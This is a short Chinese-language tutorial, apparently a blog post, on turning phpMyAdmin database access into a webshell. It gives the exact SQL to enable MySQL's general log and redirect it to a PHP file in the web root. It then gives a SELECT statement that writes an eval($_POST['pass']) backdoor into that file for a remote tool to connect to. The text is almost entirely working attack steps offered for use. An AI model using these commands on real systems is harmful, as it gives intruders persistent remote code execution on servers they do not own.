如图所示,拿到了phpmyadmin的权限,且有更改数据库的权限
首先搜索和日志相关的设置
show variables like '%general%';
可以看到,日志的生成是关闭的,同时文件也无法访问,那我们就需要修改日志的路径。
首先就是要开启日志
set global general_log = on;
接下来就是设置日志位置,这个需要根据情况来定
set global general_log_file = "C:/phpstudy/www/cmd.php"
检查一下看
这样子我们人工生成一条带有shell的日志
select "<?php
eval($_POST['pass']);?>";
这样子,木马就写进了网站根目录的cmd.php里面,用工具即可连接。
发表评论